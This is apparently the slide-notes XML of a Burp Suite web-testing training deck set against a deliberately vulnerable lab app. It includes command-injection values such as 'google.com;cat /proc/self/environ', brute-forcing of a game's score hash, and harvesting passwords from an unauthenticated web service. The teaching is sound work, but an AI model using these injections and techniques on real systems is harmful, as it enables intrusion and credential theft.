            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Click on Submit.</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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17632259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Find the request that was just sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> page, in the Proxy HTTP History tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send the request to the Repeater tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send the original request to validate it still works.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381956356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Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with an operating system command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google.com;ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -al</a:t>
            </a:r>
          </a:p>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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264838672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Inspect environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> variables. Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google.com;cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/self/environ</a:t>
            </a:r>
          </a:p>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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32101889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Click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> on the Snake link when logged into the dojo-basic application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Play a single game where you only score 10 points. </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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32079248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Send the POST request to the Repeater tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. We will be looking at the score and score hash parameters.</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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275770428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Send the original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> request to validate the Response output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send the response to the Comparer tool.</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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40057713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Add one point to the score, submit and see if the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> response is the same.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send the response to the Comparer tool.</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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415660997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Open the Comparer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tool. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Select both responses, then click on the Word button.</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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1395758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Setup rules for scanning. Always a good idea to set the Options to only scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> In-Scope items.</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7403800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When viewing by word we can see that successful requests have a &amp;status=ok&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> body while failed requests contain nothing visible in the body. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The body can be used with the Intruder tool to quickly filter out results.</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124307365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Send the POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> request to the Intruder Tool (send the good request).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>On the Positions tab, Clear all positions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Add score and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>scorehash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> values as positions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Set the Attack Type to: Cluster Bomb</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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39570594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For Position 1, set the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> payload type to Numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Set the Range to: 0 – 11 with an increment of 1.</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124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148288075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For Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 2, set the type to Numbers again. If using the free version see scroll down in slides to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snake Intruder – Free Version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For the Pro version set the range to: 0 – 2000 with an increment of 1.</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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17095275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On the Options tab, Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the &amp;status=ok&amp; to the list. Remove all other values in the list.</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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297460605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Once the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> results come back you can sort on the &amp;status=ok&amp; column to only see the requests that came back successful. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>We can see that for 0, the hash value is 1337.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For 1, the hash value is 1338</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For 2, the hash value is 1341</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>It appears that we square the score value and then add 1337 to obtain a valid score hash.</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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309342007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The high score will always increment by one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take the high score,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> then add one point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Square the new value and then add 1337 to get the score hash value needed.</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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407450394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Refresh the web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> page or use Burp and get the new list of high scores.</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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172764365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Instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> extraction we can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> selection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Click on the Add button and this window will happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Highlight the text and it will populate the start and end for you.</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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201438740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Make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> sure the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> – Extract check box is checked. </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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4188096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Most testing time will be spent bouncing from the Proxy tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to the Repeater and Intruder tabs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set interception on/off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show HTTP history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit proxy options </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Export CA cert to import into browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set rules on what to intercept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set rules on modifying values based off conditions and regular expressions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380527968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If using the free version of Burp use the modified values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> list so that the results will be returned much quicker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Use the Simple List or put the values in a txt file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Values: 1336, 1337, 1338, 1341, 1346, 1353, 1362, 1373, 1386, 1401, 1418, 1437, 1458</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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378490432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The output when using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Extraction and the modified short list of numbers.</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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21993583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From looking for content the /services/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> directory was found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send the WSDL request to WSDLR to be parsed.</a:t>
            </a:r>
          </a:p>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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23622367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This 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party plugin will parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> WSDL files and attempt to generate the correct XML for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send this request to the Repeater tab.</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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219753575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In Repeater test the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> xml to validate it will work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>It seems for this web service we don’t need to be logged in, and only need a username to get back passwords.</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325591523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Use the CO2 User Generator to create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a list of names to try against the web service. Or use your own username list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>I only used lowercase and common nicknames for this test.</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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21940338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Send the request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from Repeater into the Intruder tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Set the Position attack type to Sniper, and set the user name value as the only payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>On the Payload tab, paste in the username list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2947772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To help look for valid users use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Extract on the value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> output in the &lt;return&gt; element.</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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398207242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Once the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Extract is setup, start the attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371545226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If SQL injection was not a vulnerability this web service could be used to become</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> any user based off bad programming practices.</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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387188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Manually fuzz a request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use CTRL+R to send request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to the Repeater tab, or CMD+R if on a MAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for manually fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to narrow down options when using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or even intruder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send to Comparer tab before setting up intruder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/match rules.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
